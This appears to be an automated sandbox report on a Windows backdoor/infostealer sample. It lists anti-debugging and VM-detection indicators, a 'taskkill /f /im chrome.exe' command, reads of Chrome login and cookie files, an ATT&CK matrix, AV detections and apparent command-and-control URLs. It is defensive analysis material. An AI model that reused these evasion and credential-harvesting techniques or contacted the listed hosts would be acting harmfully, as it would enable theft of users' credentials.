Source: 6272167835D47591.exe, 00000002.00000003.263182441.0000000000BB4000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}B=3s
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}w
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: 6272167835D47591.exe, 00000002.00000003.286909259.000000000418A000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.266340600.0000000002E50000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6272167835D47591.exe, 00000002.00000002.349129349.0000000000BB9000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}B=3s
Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000003.266653982.0000000002B34000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugFlags

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EFAF0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001A010 IsDebuggerPresent,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EE116 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,InterlockedPopEntrySList,VirtualAlloc,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D290 EnterCriticalSection,std::_Xinvalid_argument,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D340 GetCurrentThreadId,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D300 SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B11C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00411380 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001779F cpuid

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: _memset,RegCloseKey,_memset,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004415F0 GetSystemTime,RegSetValueExW,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004C8360 LookupAccountNameW,GetLastError,LookupAccountNameW,CopySid,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00463240 GetVersionExW,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Replication Through Removable Media1	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information2	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Browser Extensions1	Access Token Manipulation1	Install Root Certificate2	NTDS	File and Directory Discovery3	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Bootkit1	Process Injection11	Software Packing1	LSA Secrets	System Information Discovery157	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Query Registry2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Security Software Discovery561	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Valid Accounts1	Proc Filesystem	Virtualization/Sandbox Evasion13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion13	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection11	Input Capture	Remote System Discovery11	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Bootkit1	Keylogging	System Network Configuration Discovery11	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N1yprTBBXs.exe	38%	Virustotal		Browse
N1yprTBBXs.exe	22%	Metadefender		Browse
N1yprTBBXs.exe	59%	ReversingLabs	Win32.Backdoor.Poison
N1yprTBBXs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	22%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	59%	ReversingLabs	Win32.Backdoor.Poison
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\1611970727133.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\1611970727133.exe	14%	ReversingLabs	Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://84cfba021a5a6662.xyz/info_old/g	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/e	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/w	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
https://A5D4CE54CC78B3CA.xyz/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/r	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://ocsp.pki.goog/gts1o1core0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xy/info_old/w	0%	Avira URL Cloud	safe
http://ocsp.pki.goog/GTSGIAG30	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
http://ocsp.pki.goog/gsr202	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/info_old/ddd	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	0%	Avira URL Cloud	safe
https://www.instagram.comsec-fetch-mode:	0%	Avira URL Cloud	safe
https://twitter.comReferer:	0%	Avira URL Cloud	safe
http://84CFBA021A5A6662.xyz/#y	0%	Avira URL Cloud	safe
http://www.interestvideo.com/video1.php	0%	Avira URL Cloud	safe
https://A5D4CE54CC78B3CA.xyz/t	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
84CFBA021A5A6662.xyz	104.21.23.16	true	false		unknown
84cfba021a5a6662.xyz	104.21.23.16	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://84cfba021a5a6662.xyz/info_old/g	false	Avira URL Cloud: safe	unknown
